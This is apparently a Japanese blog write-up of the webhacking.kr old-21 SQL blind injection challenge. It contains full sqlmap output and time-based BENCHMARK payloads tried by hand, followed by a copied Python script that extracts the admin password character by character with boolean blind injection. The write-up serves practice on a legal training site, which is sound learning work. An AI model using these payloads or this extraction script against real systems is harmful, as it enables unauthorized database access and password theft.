sqlmap
Hacking kr old21について
SQL Blind Injectionと書いてあるので、SQLインジェクションを検討する。
いくつか候補になりそうなコードを入れてみたが、難しかった...
そこで、 sqlmap
を使用してみる。
$ sqlmap -u "https://webhacking.kr/challenge/bonus-1/index.php?id=admin&pw=password" --level 2 --risk 3 --dbms mysql ___ __H__ ___ ___[']_____ ___ ___ {1.8.8#stable} |_ -| . [,] | .'| . | |___|_ [)]_|_|_|__,| _| |_|V... |_| https://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 07:56:58 /2024-08-16/ [07:56:59] [INFO] testing connection to the target URL you have not declared cookie(s), while server wants to set its own ('PHPSESSID=npe4dc0muie...drovtqdqoe'). Do you want to use those [Y/n] Y [07:57:01] [INFO] testing if the target URL content is stable [07:57:01] [INFO] target URL content is stable [07:57:01] [INFO] testing if GET parameter 'id' is dynamic [07:57:01] [WARNING] GET parameter 'id' does not appear to be dynamic [07:57:01] [WARNING] heuristic (basic) test shows that GET parameter 'id' might not be injectable [07:57:01] [INFO] testing for SQL injection on GET parameter 'id' [07:57:01] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [07:57:02] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause' [07:57:04] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)' [07:57:05] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (subquery - comment)' [07:57:07] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (comment)' [07:57:07] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (comment)' [07:57:09] [INFO] testing 'Boolean-based blind - Parameter replace (original value)' [07:57:09] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL)' [07:57:09] [INFO] testing 'Boolean-based blind - Parameter replace (CASE)' [07:57:09] [INFO] testing 'Generic inline queries' [07:57:09] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause' [07:57:11] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause' [07:57:11] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' [07:57:12] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' [07:57:13] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)' [07:57:13] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)' [07:57:14] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)' [07:57:15] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)' [07:57:15] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)' [07:57:15] [INFO] testing 'MySQL inline queries' [07:57:15] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)' [07:57:16] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' [07:57:17] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP)' [07:57:18] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP)' [07:57:19] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP)' [07:57:19] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (BENCHMARK)' [07:57:27] [INFO] GET parameter 'id' appears to be 'MySQL < 5.0.12 AND time-based blind (BENCHMARK)' injectable for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (2) value? [Y/n] Y [07:57:47] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns' [07:57:47] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found [07:57:49] [INFO] testing 'Generic UNION query (NULL) - 21 to 40 columns' [07:57:51] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns' [07:57:53] [INFO] testing 'MySQL UNION query (NULL) - 21 to 40 columns' [07:57:54] [INFO] checking if the injection point on GET parameter 'id' is a false positive GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N sqlmap identified the following injection point(s) with a total of 355 HTTP(s) requests: --- Parameter: id (GET) Type: time-based blind Title: MySQL < 5.0.12 AND time-based blind (BENCHMARK) Payload: id=admin' AND 9708=BENCHMARK(5000000,MD5(0x6a787555)) AND 'ZxXn'='ZxXn&pw=password --- [07:58:26] [INFO] the back-end DBMS is MySQL [07:58:26] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y web application technology: PHP, Apache back-end DBMS: MySQL < 5.0.12 (MariaDB fork) [07:59:51] [INFO] fetched data logged to text files under '/Users/xxxxxxxx/.local/share/sqlmap/output/webhacking.kr' [*] ending @ 07:59:51 /2024-08-16/
idパラメーターに以下の値を入れることで、レスポンスに時間がかかることがわかった。
id=admin' AND 9708=BENCHMARK(3000000,MD5(0x6a787555)) AND 'ZxXn'='ZxXn&pw=password
その後、パラメーターを削ってみる
id=admin' AND 9708=BENCHMARK(3000000,MD5(0x6a787555)) AND 'ZxXn'='ZxXn
パスワードの文字数を確認しにいく
この後、パスワードが何文字以上かを確認しにいく
id=admin' AND IF( 1=1 , 9708=BENCHMARK(3000000,MD5(0x6a787555)), 1=1) AND 'ZxXn'='ZxXn
-> 3秒以上かかった
id=admin' AND IF( 1=2 , 9708=BENCHMARK(3000000,MD5(0x6a787555)), 1=1) AND 'ZxXn'='ZxXn
-> すぐに返却された。
これで、 二つのAND
演算に挟まったSQLが有効であることがわかった。
次は、文字数の長さを確認する
id=admin' AND IF( LENGTH('aaa')=3 , 9708=BENCHMARK(3000000,MD5(0x6a787555)), 1=1) AND 'ZxXn'='ZxXn
-> 3秒以上かかった
id=admin' AND IF( LENGTH('aaaa')=3 , 9708=BENCHMARK(3000000,MD5(0x6a787555)), 1=1) AND 'ZxXn'='ZxXn
-> すぐに返却された。
id=admin' AND IF( LENGTH(id)>0 , 9708=BENCHMARK(3000000,MD5(0x6a787555)), 1=1) AND 'ZxXn'='ZxXn
id=admin' AND IF( LENGTH(id)>0 , 9708=BENCHMARK(3000000,MD5(0x6a787555)), 1=1) AND 'ZxXn'='ZxXn
id=admin' AND IF( length(pw)='%5%' , 9708=BENCHMARK(3000000,MD5(0x6a787555)), 1=1) AND 'ZxXn'='ZxXn
-> falseid=admin' AND IF( length(pw)like(36) , 9708=BENCHMARK(3000000,MD5(0x6a787555)), 1=1) AND 'ZxXn'='ZxXn
-> falseid=admin' AND IF( length(pw)like(36) , 9708=BENCHMARK(3000000,MD5(0x6a787555)), 1=1) AND 'ZxXn'='ZxXn
-> false
ここまででギブアップ。
回答
海外のサイトで、こんな回答をしている方がいた。
https://ethical-hack.tistory.com/23
docker run --rm -v .:/app -w /app python:3-slim bash -c "pip install requests && python main.py"
Blind Injectionのために別のトリガー(time-basedでない)をキーとしている方であった。
import requests headers = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) \AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117'} cookies = {'PHPSESSID':'YOUR SESSION ID VALUE'} def HttpRequest(): str_len = 0 password = "" for i in range(50): url = "https://webhacking.kr/challenge/bonus-1/index.php?id=admin\' and if(length(pw)like({}),1,0) or \'1'=\'0&pw=1".format(i) res = requests.get(url, headers=headers, cookies=cookies) if res.text.find('wrong password') > 0: str_len = i for i in range(1, str_len + 1): for j in range(48,128): url = "https://webhacking.kr/challenge/bonus-1/index.php?id=admin\' and if(ord(substr(pw,{},1))like({}),1,0) or \'1\'=\'0&pw=1".format(i,j) res = requests.get(url, headers=headers, cookies=cookies) if res.text.find('wrong password') > 0: password += chr(j) break print("Password Length: {}".format(str_len)) print("Password: {}".format(password)) if __name__ == '__main__': HttpRequest()
page:https://minegishirei.hatenablog.com/entry/2024/08/17/110244